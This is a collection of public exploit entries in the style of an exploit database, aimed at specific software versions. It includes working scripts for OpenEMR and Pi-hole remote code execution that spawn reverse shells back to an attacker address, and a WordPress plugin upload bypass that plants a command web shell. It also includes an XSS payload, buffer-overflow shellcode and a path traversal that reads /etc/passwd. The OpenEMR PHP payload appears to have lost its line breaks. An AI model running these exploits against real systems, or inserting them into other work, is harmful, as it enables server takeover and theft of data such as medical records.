# Version: < 5.0.1 (Patch 4)
# Tested on: Ubuntu LAMP, OpenEMR Version 5.0.1.3
# References: https://medium.com/@musyokaian/openemr-version-5-0-1-remote-code-execution-vulnerability-2f8fd8644a69
# openemr_exploit.py
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
#
# Flat script, three steps over one requests.Session (cookies persist):
#   1. POST the login form to main_screen.php with the credentials in `data`
#   2. POST `payload` to portal/import_template.php, which stores the PHP under docid 'shell.php'
#   3. GET portal/shell.php so the stored PHP runs (it connects back to $ip:$port)
# Every host, path and credential is hard-coded; edit the marked values before use.
import requests
import time

auth = "[+] Authentication with credentials provided please be patient"
upload = "[+] Uploading a payload it will take a minute"
netcat = "[+] You should be getting a shell"
s = requests.Session()

# The 'content' value is a PHP reverse shell; $ip / $port inside it are the
# listener it connects back to.  NOTE(review): in this copy the PHP appears to
# have lost its original line breaks, so each `//` comment would run to the
# end of the literal and the code would no longer parse as the author intended.
payload = {'site': 'default', 'mode' : 'save', 'docid' : 'shell.php', 'content' : """<?php set_time_limit (0); $VERSION = "1.0"; $ip = '127.0.0.1'; # CHANGE THIS $port = 9001; # CHANGE THIS $chunk_size = 1400; $write_a = null; $error_a = null; $shell = 'uname -a; w; id; /bin/sh -i'; $daemon = 0; $debug = 0; // // Daemonise ourself if possible to avoid zombies later // // pcntl_fork is hardly ever available, but will allow us to daemonise // our php process and avoid zombies. Worth a try... if (function_exists('pcntl_fork')) { // Fork and have the parent process exit $pid = pcntl_fork(); if ($pid == -1) { printit("ERROR: Can't fork"); exit(1); } if ($pid) { exit(0); // Parent exits } // Make the current process a session leader // Will only succeed if we forked if (posix_setsid() == -1) { printit("Error: Can't setsid()"); exit(1); } $daemon = 1; } else { printit("WARNING: Failed to daemonise. This is quite common and not fatal."); } // Change to a safe directory chdir("/"); // Remove any umask we inherited umask(0); // // Do the reverse shell... 
// // Open reverse connection $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { printit("$errstr ($errno)"); exit(1); } // Spawn shell process $descriptorspec = array( 0 => array("pipe", "r"), // stdin is a pipe that the child will read from 1 => array("pipe", "w"), // stdout is a pipe that the child will write to 2 => array("pipe", "w") // stderr is a pipe that the child will write to ); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { printit("ERROR: Can't spawn shell"); exit(1); } // Set everything to non-blocking // Reason: Occsionally reads will block, even though stream_select tells us they won't stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); printit("Successfully opened reverse shell to $ip:$port"); while (1) { // Check for end of TCP connection if (feof($sock)) { printit("ERROR: Shell connection terminated"); break; } // Check for end of STDOUT if (feof($pipes[1])) { printit("ERROR: Shell process terminated"); break; } // Wait until a command is end down $sock, or some // command output is available on STDOUT or STDERR $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); // If we can read from the TCP socket, send // data to process's STDIN if (in_array($sock, $read_a)) { if ($debug) printit("SOCK READ"); $input = fread($sock, $chunk_size); if ($debug) printit("SOCK: $input"); fwrite($pipes[0], $input); } // If we can read from the process's STDOUT // send data down tcp connection if (in_array($pipes[1], $read_a)) { if ($debug) printit("STDOUT READ"); $input = fread($pipes[1], $chunk_size); if ($debug) printit("STDOUT: $input"); fwrite($sock, $input); } // If we can read from the process's STDERR // send data down tcp connection if (in_array($pipes[2], $read_a)) { if ($debug) printit("STDERR READ"); $input = fread($pipes[2], $chunk_size); if ($debug) 
printit("STDERR: $input"); fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); // Like print, but does nothing if we've daemonised ourself // (I can't figure out how to redirect STDOUT like a proper daemon) function printit ($string) { if (!$daemon) { print "$string\n"; } } ?> """}

print (auth)
# Step 1: authenticate; the session keeps the resulting cookies
url = "http://localhost/openemr/interface/main/main_screen.php?auth=login&site=default"
data= {
    'new_login_session_management' : '1',
    'authProvider' : 'Default',
    'authUser' : 'admin',           # change this to the appropriate username
    'clearPass' : 'password123',    # change this to the appropriate password
    'languageChoice' : '1',
}
response = s.post(url, data=data,).text   # login response body is not checked
time.sleep(2)
print (upload)
time.sleep(2)
# Step 2: store the PHP under the docid given in `payload`
resp = s.post("http://localhost/openemr/portal/import_template.php?site=default", data = payload)
time.sleep(2)
print (netcat)
# Step 3: request the stored file so it executes; the output is whatever the server returns
rev_shell = s.get("http://localhost/openemr/portal/shell.php")
print (rev_shell.text)
-
Open-AudIT 3.3.0 - Reflective Cross-Site Scripting (Authenticated)
# Exploit Title: Open-AudIT 3.3.0 - Reflective Cross-Site Scripting (Authenticated) # Date: 2020-04-26 # Exploit Author: Kamaljeet Kumar # Vendor Homepage: https://opmantek.com/network-discovery-inventory-software/ # Software Link: https://www.open-audit.org/downloads.php # Version: 3.3.0 # CVE : CVE-2020-12261 # POC: Step 1: Login to Open-Audit Step 2: Go to "http://192.168.0.4/open-audit/index.php/search/" and add this "<svg><animate onend=alert(1) attributeName=x dur=1s>" payload after the search, the URL look like: http://192.168.0.4/open-audit/index.php/search/<svg><animate onend=alert(1) attributeName=x dur=1s> Then we get the XSS pop up.
-
StreamRipper32 2.6 - Buffer Overflow (PoC)
# Exploit Title: StreamRipper32 2.6 - Buffer Overflow (PoC) # Date: 2020-05-14 # Exploit Author: Andy Bowden # Tested On: Win10 x64 # Download Link: http://streamripper.sourceforge.net/sr32/StreamRipper32_2_6.exe # Vendor Page: http://streamripper.sourceforge.net/ # Version: 2.6 # Steps To Reproduce: Double click on "Add" in the"Station/Song Section" and paste the output in "SongPattern" #Bad Characters \x00\x0A\x0D file = open('exploit.txt', 'wb') buf = b"" buf += b"A" * 256 buf += b"\x47\x23\x30\x74" #74302347 buf += b"\x90" * 30 #calc payload buf += b"\xdb\xc2\xbd\x72\x07\xda\xa7\xd9\x74\x24\xf4\x58\x29" buf += b"\xc9\xb1\x31\x83\xe8\xfc\x31\x68\x14\x03\x68\x66\xe5" buf += b"\x2f\x5b\x6e\x6b\xcf\xa4\x6e\x0c\x59\x41\x5f\x0c\x3d" buf += b"\x01\xcf\xbc\x35\x47\xe3\x37\x1b\x7c\x70\x35\xb4\x73" buf += b"\x31\xf0\xe2\xba\xc2\xa9\xd7\xdd\x40\xb0\x0b\x3e\x79" buf += b"\x7b\x5e\x3f\xbe\x66\x93\x6d\x17\xec\x06\x82\x1c\xb8" buf += b"\x9a\x29\x6e\x2c\x9b\xce\x26\x4f\x8a\x40\x3d\x16\x0c" buf += b"\x62\x92\x22\x05\x7c\xf7\x0f\xdf\xf7\xc3\xe4\xde\xd1" buf += b"\x1a\x04\x4c\x1c\x93\xf7\x8c\x58\x13\xe8\xfa\x90\x60" buf += b"\x95\xfc\x66\x1b\x41\x88\x7c\xbb\x02\x2a\x59\x3a\xc6" buf += b"\xad\x2a\x30\xa3\xba\x75\x54\x32\x6e\x0e\x60\xbf\x91" buf += b"\xc1\xe1\xfb\xb5\xc5\xaa\x58\xd7\x5c\x16\x0e\xe8\xbf" buf += b"\xf9\xef\x4c\xcb\x17\xfb\xfc\x96\x7d\xfa\x73\xad\x33" buf += b"\xfc\x8b\xae\x63\x95\xba\x25\xec\xe2\x42\xec\x49\x1c" buf += b"\x09\xad\xfb\xb5\xd4\x27\xbe\xdb\xe6\x9d\xfc\xe5\x64" buf += b"\x14\x7c\x12\x74\x5d\x79\x5e\x32\x8d\xf3\xcf\xd7\xb1" buf += b"\xa0\xf0\xfd\xd1\x27\x63\x9d\x3b\xc2\x03\x04\x44" buf += b"\x90" * (1000 - len(buf)) file.write(buf) file.close()
-
Joomla! Plugin XCloner Backup 3.5.3 - Local File Inclusion (Authenticated)
# Exploit Title: Joomla! Plugin XCloner Backup 3.5.3 - Local File Inclusion (Authenticated) # Date: 2020-05-10 # Exploit Author: Mehmet Kelepçe / Gais Cyber Security # Exploit-Db Author ID: 8763 # Reference: https://www.xcloner.com/xcloner-news/security-release-available-for-archived-joomla-version/ # Vendor Homepage: http://www.xcloner.com # Software Link: https://www.xcloner.com/support/download/ # Version: 3.5.3 # Tested on: Kali Linux - Apache2 -------------------------------------------------------------------------------- Detail: -------------------------------------------------------------------------------- File: administrator/components/com_xcloner-backupandstore/admin.cloner.php --> ------------ case 'download': downloadBackup($_REQUEST['file']); break; ------------- downloadBackup function's file -> administrator/components/com_xcloner-backupandstore/cloner.functions.php Vulnerable parameter: file downloadBackup function's definition -------------------------------------------------------------------------------- function downloadBackup($file) { global $_CONFIG; $file = realpath($_CONFIG['clonerPath'] . 
"/$file"); //First, see if the file exists if (!is_file($file)) { die("<b>404 File $file was not found!</b>"); } //File Info $len = get_filesize($file); $filename = basename($file); $file_extension = strtolower(substr(strrchr($filename, "."), 1)); //Setam Content-Type-urile pentru fisierul in cauza switch ($file_extension) { default: $ctype = "application/force-download"; } smartReadFile($file, $filename); exit; } -------------------------------------------------------------------------------- and smartReadFile function's definition -------------------------------------------------------------------------------- function smartReadFile($location, $filename, $mimeType='application/octet-stream') { if(!file_exists($location)) { header ("HTTP/1.0 404 Not Found"); return; } $size=filesize($location); $time=date('r',filemtime($location)); $fm=@fopen($location,'r'); . . . -------------------------------------------------------------------------------- PoC: Request: -------------------------------------------------------------------------------- GET /joomla/administrator/index.php?option=com_xcloner-backupandrestore&task=download&file=../../../../../../../../etc/passwd HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/joomla/administrator/index.php?option=com_xcloner-backupandrestore&task=view Connection: close Cookie: COOKIES Upgrade-Insecure-Requests: 1 -------------------------------------------------------------------------------- Response: -------------------------------------------------------------------------------- HTTP/1.0 200 OK Date: Sun, 10 May 2020 18:12:04 GMT Server: Apache/2.4.41 (Debian) Cache-Control: public, must-revalidate, max-age=0 Pragma: no-cache Accept-Ranges: bytes Content-Length: 3347 Content-Range: bytes 0-3347/3347 
Content-Disposition: inline; filename=passwd Content-Transfer-Encoding: binary Last-Modified: Sun, 22 Mar 2020 05:41:35 -0700 Connection: close Content-Type: application/octet-stream root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync . .
-
Pi-hole 4.4.0 - Remote Code Execution (Authenticated)
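# Exploit Title: Pi-hole 4.4.0 - Remote Code Execution (Authenticated)
# Date: 2020-05-22
# Exploit Author: Photubias
# Vendor Advisory: [1] https://github.com/pi-hole/AdminLTE
# Version: Pi-hole <=4.4.0 + Web <=4.3.3
# Tested on: Pi-hole v4.4.0-g9e49077, Web v4.3.3,v4.3.2-1-g4f824be, FTL v5.0 (on Debian 10)
# CVE: CVE-2020-11108
#!/usr/bin/env python3
'''
Copyright 2020 Photubias(c)

This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.

Based (and improved on): https://github.com/Frichetten/CVE-2020-11108-PoC/blob/master/cve-2020-11108-rce.py

File name CVE-2020-11108.py
written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be

## Vulnerable setup instructions (from clean Debian 10-Buster):
> apt update && apt install -y curl
> curl -sSL https://install.pi-hole.net | bash
> pihole checkout web release/v4.3.3
> cd /etc/.pihole/ && git checkout v4.4
> pihole -r ## Select reconfigure

This is a native implementation without requirements, written in Python 3.
Works equally well on Windows as Linux (as MacOS, probably ;-)
Features:
* Does a reliable check before exploitation (not based on version numbers)
* Performs normal RCE without Privilege Escalation (which is more trust worthy)
* Asks before running Root RCE (as this overwrites certain files)
* Performs a cleanup in all cases (success / failure)

How it works (as far as this script shows): a blocklist URL of the form
'http://<our ip>#" -o <file> -d "' is saved through the admin UI; when
gravity.sh.php is triggered the injected options make the fetch write
whatever our port-80 listener serves into <file> under
/admin/scripts/pi-hole/php/, which is then requested to run the PHP.
'''
import urllib.request
import urllib.parse
import ssl
import http.cookiejar
import http.client
import sys
import string
import random
import socket
import _thread
import time

## Default vars; change at will
_sURL = '192.168.50.130'
_sPASSWORD = '6DS4QtW5'
_iTIMEOUT = 5
_sLOCALIP = '192.168.50.1'
_sFILENAME = 'fun2.php'
_sLOCALNCPORT = '4444' ## Make sure to set up a listener on this port first

## Ignore unsigned certs.
## NOTE(review): this is process-wide, every HTTPS connection made by this
## interpreter skips certificate verification, not only the one to the Pi-hole.
ssl._create_default_https_context = ssl._create_unverified_context

## Keep track of cookies between requests (the admin session lives here)
cj = http.cookiejar.CookieJar()
oOpener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))

## Errors the HTTP calls below can raise: transport errors, HTTPError (a
## subclass of OSError) for non-2xx answers, and malformed-response errors.
_HTTP_ERRORS = (OSError, http.client.HTTPException)


def randomString(iStringLength=8):
    """Return iStringLength random ASCII-lowercase letters (used for the dropped PHP file name)."""
    sLetters = string.ascii_lowercase
    return ''.join(random.choice(sLetters) for i in range(iStringLength))


def postData(sURL, lData, bEncode = True):
    """POST lData to sURL through the cookie-aware opener and return the response.

    bEncode=True form-encodes the dict; otherwise str(lData) is sent verbatim.
    Any transport or HTTP error ends the program, as in the original.
    """
    try:
        if bEncode:
            oData = urllib.parse.urlencode(lData).encode()
        else:
            oData = str(lData).encode()
        oRequest = urllib.request.Request(url = sURL, data = oData)
        return oOpener.open(oRequest, timeout = _iTIMEOUT)
    except _HTTP_ERRORS as oErr:
        print('----- ERROR, site down? (' + str(oErr) + ')')
        sys.exit(1)


def normalizeUrl(sURL):
    """Turn a host, IP or partial URL into the admin base URL without a trailing slash.

    Adds 'http://' when no scheme is given and '/admin' when it is not already
    present, e.g. '192.168.50.130' -> 'http://192.168.50.130/admin'.
    Callers append paths that start with '/', so the result must not end in one.
    """
    if not sURL[:4].lower() == 'http':
        sURL = 'http://' + sURL
    ## The original tested sURL[:-1] == '/' (everything but the last char),
    ## which is never true, so a URL that already ended in '/' got a second
    ## one and every later request used '//' in its path.
    sURL = sURL.rstrip('/')
    if not '/admin' in sURL:
        sURL += '/admin'
    return sURL


def getEndpoint():
    """Normalise the global _sURL and confirm the admin page answers HTTP 200; exits otherwise."""
    sURL = normalizeUrl(_sURL)
    try:
        oRequest = urllib.request.Request(sURL)
        oResponse = oOpener.open(oRequest, timeout = _iTIMEOUT)
    except _HTTP_ERRORS as oErr:
        print('[-] Error: ' + sURL + ' not responding (' + str(oErr) + ')')
        sys.exit(1)
    if oResponse.code == 200:
        print('[+] Vulnerable URL is ' + sURL)
        return sURL
    print('[-] Error: ' + sURL + ' does not exist?')
    sys.exit(1)


def startListener(sPayload, iSockTimeout):
    """Serve sPayload to the first client that connects to _sLOCALIP:80, then close.

    Listener must always be on port 80, does not work otherwise (the injected
    list URL is 'http://<_sLOCALIP>' with no port). Gives up after
    iSockTimeout seconds without a connection. Intended to run in a thread.
    """
    oSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    ## The script binds port 80 several times in quick succession; without this
    ## a later bind can fail with 'Address already in use' while the previous
    ## connection is still in TIME_WAIT.
    oSock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    print('[!] Binding to '+_sLOCALIP+':80')
    try:
        oSock.bind((_sLOCALIP,80))
    except OSError as oErr:
        print('[-] Cannot bind ' + _sLOCALIP + ':80 (' + str(oErr) + '); port 80 usually needs root/admin rights')
        oSock.close()
        return
    oSock.settimeout(iSockTimeout)
    oSock.listen()
    try:
        try:
            oConn,sAddr= oSock.accept()
        except (socket.timeout, OSError):
            print('[-] No callback within ' + str(iSockTimeout) + ' seconds')
            return
        print('[+] Yes, we have an incoming connection from '+str(sAddr[0]))
        oConn.sendall(sPayload.encode())
        oConn.close()
    finally:
        oSock.close()
        print('[!] Closing Listener')


def launchListener(sPayload, iSockTimeout = 5):
    """Start startListener() in a background thread and give it a moment to bind.

    The original triggered the update immediately after start_new_thread, so
    the target's callback could race the listener's bind()/listen().
    """
    _thread.start_new_thread(startListener,(sPayload,iSockTimeout,))
    time.sleep(0.5)


def doLogin(sURL, sPassword):
    """Log in to the admin UI; the session cookie lands in the shared cookie jar. Exits on a wrong password."""
    sPath = '/index.php?login'
    lData = {'pw':sPassword}
    oResponse = postData(sURL + sPath, lData)
    sResult = oResponse.read().decode(errors='ignore')
    if 'Wrong password' in sResult:
        print('Wrong password')
        sys.exit(1)
    return True


def getToken(sURL):
    """Scrape the CSRF token from the blocklists tab; every settings POST needs it. Exits if absent."""
    sPath = '/settings.php?tab=blocklists'
    oResponse = oOpener.open(urllib.request.Request(sURL + sPath), timeout = _iTIMEOUT)
    sResult = oResponse.read().decode(errors='ignore')
    if 'id=\'token\'' in sResult:
        return sResult.split('id=\'token\' hidden>')[1].split('<')[0]
    print('[-] Error in getting a token')
    sys.exit(1)


def createBackdoor(sURL, sFilename):
    """Add the injected adlist entry and return its index as a string ('' if the POST was not 200).

    The '#' ends the URL for the fetcher; what follows ('" -o <sFilename> -d "')
    is treated as extra command-line options, so the next update writes the
    fetched body to sFilename (see callExploit for where it is served from).
    """
    sToken = getToken(sURL)
    sPath = '/settings.php?tab=blocklists'
    lData = {'newuserlists':'http://' + _sLOCALIP + '#" -o ' + sFilename + ' -d "',
             'field':'adlists',
             'token':sToken,
             'submit':'save'}
    oResponse = postData(sURL + sPath, lData)
    if oResponse.code != 200:
        return ''
    sResult = oResponse.read().decode(errors='ignore')
    ## Each list renders one target="_new" link: N links give N+1 fragments, so
    ## len-2 is the 0-based index of the last (our) entry, matching the
    ## 'adlist-del-<index>' field removeEntry() posts.
    arrBlocklists = sResult.split('target="_new"')
    sID = str(len(arrBlocklists)-2)
    print('[+] Creation success, ID is '+sID+'!')
    return sID


def doUpdate(sURL):
    """Trigger gravity (the blocklist update) so the injected options run; True on HTTP 200."""
    sPath = '/scripts/pi-hole/php/gravity.sh.php'
    try:
        oResponse = oOpener.open(urllib.request.Request(sURL + sPath), timeout = _iTIMEOUT)
    except _HTTP_ERRORS as oErr:
        print('[-] Error; callback failed, maybe a firewall issue? (' + str(oErr) + ')')
        return False
    if oResponse.code == 200:
        print('[+] Update succeeded.')
        return True
    return False


def callExploit(sURL, sFilename = _sFILENAME):
    """Request the dropped PHP file so its payload executes; prints whatever it returns."""
    sPath = '/scripts/pi-hole/php/' + sFilename
    print('[+] Calling ' + sURL + sPath)
    try:
        oResponse = oOpener.open(urllib.request.Request(sURL + sPath), timeout = _iTIMEOUT)
    except _HTTP_ERRORS as oErr:
        ## Best effort: the shell_exec() payload blocks while the reverse shell
        ## lives, so a timeout here may still mean the shell connected back.
        print('[-] Calling the exploit raised ' + str(oErr) + ' (check your netcat listener)')
        return
    if oResponse.code == 200:
        print('[+] Calling exploit succeeded.')
        print(oResponse.read().decode(errors='ignore'))


def removeEntry(sURL, sID):
    """Delete adlist entry sID (cleanup of the injected list)."""
    print('[+] Cleaning up now.')
    sToken = getToken(sURL)
    sPath = '/settings.php?tab=blocklists'
    lData = {'adlist-del-'+sID:'on',
             'newuserlists':'',
             'field':'adlists',
             'token':sToken,
             'submit':'save'}
    oResponse = postData(sURL + sPath, lData)
    if oResponse.code == 200:
        print('[+] Remove success')


def main():
    """Driver: verify the injection works, optionally exploit (user or root), and always clean up.

    Arguments: <dstIP> <srcIP> <PWD>; with no arguments the values are asked interactively.
    """
    global _sURL, _sPASSWORD, _iTIMEOUT, _sLOCALIP, _sFILENAME, _sLOCALNCPORT
    if len(sys.argv) == 1:
        print('[!] No arguments found: python3 CVE-2020-11108.py <dstIP> <srcIP> <PWD>')
        print(' Example: ./CVE-2020-11108.py 192.168.50.130 192.168.50.1 6DS4QtW5')
        print(' But for now, I will ask questions')
        sAnswer = input('[?] Please enter the IP address for Pi-Hole ([' + _sURL + ']): ')
        if not sAnswer == '':
            _sURL = sAnswer
        sAnswer = input('[?] Please enter the your (reachable) IP address to launch listeners ([' + _sLOCALIP + ']): ')
        if not sAnswer == '':
            _sLOCALIP = sAnswer
        sAnswer = input('[?] Please enter the password for Pi-Hole ([' + _sPASSWORD + ']): ')
        if not sAnswer == '':
            _sPASSWORD = sAnswer
    elif len(sys.argv) < 4:
        ## The original indexed argv[1..3] unconditionally and died with an IndexError.
        print('[-] Usage: python3 CVE-2020-11108.py <dstIP> <srcIP> <PWD>')
        sys.exit(1)
    else:
        _sURL = sys.argv[1]
        _sLOCALIP = sys.argv[2]
        _sPASSWORD = sys.argv[3]

    ## MAIN
    sURL = getEndpoint()
    ## Will also set the initial SessionID
    doLogin(sURL, _sPASSWORD)

    ## Creating backdoor (1) ## the old 'fun.php'
    sFilename = randomString() + '.php'
    sID = createBackdoor(sURL, sFilename)

    ## Launch first payload listener and send 200 OK: a callback proves the
    ## injection works without dropping anything harmful yet.
    launchListener('HTTP/1.1 200 OK\n\nCVE-2020-11108\n')
    if doUpdate(sURL):
        print('[+] This system is vulnerable!')

    ## Question Time
    sAnswer = input('Want to continue with exploitation? (Or just run cleanup)? [y/N]: ')
    if not sAnswer.lower() == 'y':
        removeEntry(sURL, sID)
        sys.exit(0)
    sAnswer = input('Want root access? (Breaks the application!!) [y/N]: ')
    bRoot = sAnswer.lower() == 'y'

    if bRoot:
        print('[!] Allright, going for the root shell')
        ## Launch payload listener and send root shell
        _sPayload = '''<?php shell_exec("sudo pihole -a -t") ?>'''
        launchListener(_sPayload)
        doUpdate(sURL)
        ## Creating backdoor (2), overwriting teleporter.php
        sID2 = createBackdoor(sURL, 'teleporter.php')
        ## Launch payload listener for a new 200 OK
        launchListener('HTTP/1.1 200 OK\n\nCVE-2020-11108\n')
        doUpdate(sURL)

    input('Ok, make sure to have a netcat listener on "' + _sLOCALIP + ':' + _sLOCALNCPORT + '" ("nc -lnvp ' + _sLOCALNCPORT + '") and press enter to continue...')
    ## Launch shell payload listener:
    _sPayload = '''<?php shell_exec("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"%s\\\",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\"/bin/sh\\",\\"-i\\"]);'") ?> ''' %(_sLOCALIP, _sLOCALNCPORT)
    ## A '<?php system($_GET["cmd"]); ?>' web shell also works, but that URL is authenticated.
    launchListener(_sPayload)
    doUpdate(sURL)
    ## Launching the payload, will create new PHP file
    callExploit(sURL, sFilename)

    ## Remove entry again
    if bRoot:
        removeEntry(sURL, sID2)
    removeEntry(sURL, sID)
    if len(sys.argv) == 1:
        input('[+] All done, press enter to exit')


if __name__ == "__main__":
    main()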
-
WordPress Plugin Drag and Drop File Upload Contact Form 1.3.3.2 - Remote Code Execution
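# Exploit Title: WordPress Plugin Drag and Drop File Upload Contact Form 1.3.3.2 - Remote Code Execution
# Date: 2020-05-11
# Exploit Author: Austin Martin
# Google Dork: inurl:wp-content/uploads/wp_dndcf7_uploads/
# Google Dork: inurl:wp-content/plugins/drag-and-drop-multiple-file-upload-contact-form-7/
# Vendor Homepage: https://www.codedropz.com/
# Software Link: https://wordpress.org/plugins/drag-and-drop-multiple-file-upload-contact-form-7/
# Version: 1.3.3.2
# Tested on: WordPress 5.4.1, PHP 7.41
# CVE : N/A
# Notes:
# At time of disclosure, the WordPress page listed this plugin being used by +10,000 applications
# Application was patched by vendor within 24 hours of initial disclosure
# This exploit works bypassing the allowed file types and file type sanitization. If lucky, a PHP file with a reverse shell can be uploaded and accessed
# Any file types can be added to the "supported_type" parameter
# These uploaded files can be accessed at wp-content/uploads/wp_dndcf7_uploads/
# Dangerous file types such as php have "_.txt" appended to the end creating a text file
# This can be bypassed by adding '%' to the end of the allowed file type, and the end of the file name
# ex. "php%" for file type and "shell.php%" for filename
# The PHP payload in the POC can be easily modified to gain a reverse shell
#!/usr/bin/python
"""Upload a PHP web shell through the plugin's unauthenticated dnd_codedropz_upload
AJAX action, locate it under wp-content/uploads/, then relay commands to it.

Runs under Python 2 (as originally written) and Python 3.
"""
import string
import random
import requests
from bs4 import BeautifulSoup
import sys

try:
    # Python 2: raw_input() returns the raw line; Python 3 renamed it input().
    read_line = raw_input
except NameError:
    read_line = input

payloadurl = ""
# Fixed multipart boundary reused by every part of the upload request.
BOUNDARY = "---------------------------350278735926454076983690555601"
UA_FIREFOX = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0"
UA_CHROME = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36'
# Minimal web shell: runs the 'e' query parameter and returns stdout+stderr.
PHP_SHELL = "<?php echo shell_exec($_GET['e'].' 2>&1'); ?>"


def RecurseLinks(base, file):
    """Walk the directory listing under base, descending into sub-directory
    links, and set the global payloadurl to the last link whose href contains file.

    Relies on the web server exposing a directory index of wp-content/uploads/;
    without one nothing is found and main() points at the manual method.
    """
    global payloadurl
    headers = {"User-Agent": UA_FIREFOX}
    f = requests.get(base, headers=headers)
    soup = BeautifulSoup(f.content, "html.parser")
    for root in soup.find_all("a"):
        href = root.get("href")
        # Anchors without href crashed the original with AttributeError;
        # absolute links would leave the uploads tree, so both are skipped.
        if not href or href.startswith("/"):
            continue
        if href.endswith("/"):
            RecurseLinks(base + href, file)
        elif file in href:
            print("\n[+] File Found --> " + base + href)
            payloadurl = base + href


def _build_upload_body(securitykey, file):
    """Return the multipart/form-data body that uploads PHP_SHELL as <file>.php%.

    'php%' in supported_type and the trailing '%' on the filename are what
    defeat the plugin's extension check (see the notes at the top).
    """
    delimiter = "--" + BOUNDARY + "\r\n"
    fields = [
        ("supported_type", "php%"),
        ("size_limit", "5242880"),
        ("action", "dnd_codedropz_upload"),
        ("type", "click"),
        ("security", securitykey),
    ]
    parts = []
    for name, value in fields:
        parts.append(delimiter + "Content-Disposition: form-data; name=\"" + name + "\"\r\n\r\n" + value + "\r\n")
    parts.append(delimiter + "Content-Disposition: form-data; name=\"upload-file\"; filename=\"" + file + ".php%\"\r\n"
                 "Content-Type: text/plain\r\n\r\n" + PHP_SHELL + "\r\n")
    parts.append("--" + BOUNDARY + "--\r\n")
    return "".join(parts)


def main():
    """Interactive driver: fetch the nonce, upload the shell, find it, then loop on commands."""
    print("WordPress Plugin \'Drag and Drop Multiple File Upload - Contact Form 7\' 1.3.3.2 - Unauthenticated Remote Code Execution")
    print("@amartinsec --> Twitter\nCVE:2020-12800\n")

    #Build The Request
    #Generate random URL for filename so the dropped shell is not guessable from this PoC
    file = ''.join(random.sample((string.ascii_uppercase + string.digits), 6))
    # Strip a trailing slash: every path below starts with '/'.
    urlinput = read_line("[+] Enter url to the vulnerable WordPress application: ").rstrip("/")

    #Finding the nonce used in the Ajax security string
    print("\n[+] Searching for security string nonce")
    headers = {'User-Agent': UA_CHROME}
    homepage = requests.get(urlinput, headers=headers).text
    marker = "ajax_nonce\":\""
    if marker not in homepage:
        # The original indexed split()[1] blindly and died with an IndexError here.
        print("[-] ajax_nonce not found on that page; the plugin's form must be rendered on the URL you give")
        sys.exit(1)
    securitykey = homepage.split(marker, 1)[1][:10]
    print("[+] Found security string --> " + securitykey)

    url = urlinput + "/wp-admin/admin-ajax.php"
    headers = {
        "User-Agent": UA_FIREFOX,
        "Accept": "application/json, text/javascript, */*; q=0.01",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate",
        "X-Requested-With": "XMLHttpRequest",
        "Content-Type": "multipart/form-data; boundary=" + BOUNDARY,
    }
    data = _build_upload_body(securitykey, file)

    print("\n[+] Sending payload to target")
    response = requests.post(url, headers=headers, data=data)
    # status_code instead of the original '"200" in str(response)' string match.
    if response.status_code == 200:
        print("[+] Looks like a successful file upload!\n")
    elif response.status_code == 403:
        print("\nFile Upload Failed")
        print("403 in response. Check security string")
        sys.exit(1)
    else:
        print("File upload failed. Try the manual way with Burp")
        sys.exit(1)

    print("[+] Crawling for the uploaded file. This may take a minute...")
    print("[+] Searching for " + file + ".php")
    RecurseLinks(urlinput + "/wp-content/uploads/", file)
    if payloadurl == "":
        print("Can't find the file on the web server")
        print("Try the manual method")
        sys.exit(1)

    #If all goes well, we can now send requests for RCE
    print("[+] Success\n")
    headers = {'User-Agent': UA_CHROME}
    while True:
        cmd = read_line("[+] CMD: ")
        # params= URL-encodes the command; the original appended it raw, which
        # broke on '&', '#', '+' and spaces.
        request = requests.get(payloadurl, params={"e": cmd}, headers=headers)
        print(request.text)


if __name__ == "__main__":
    main()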
-
Online Marriage Registration System 1.0 - Persistent Cross-Site Scripting
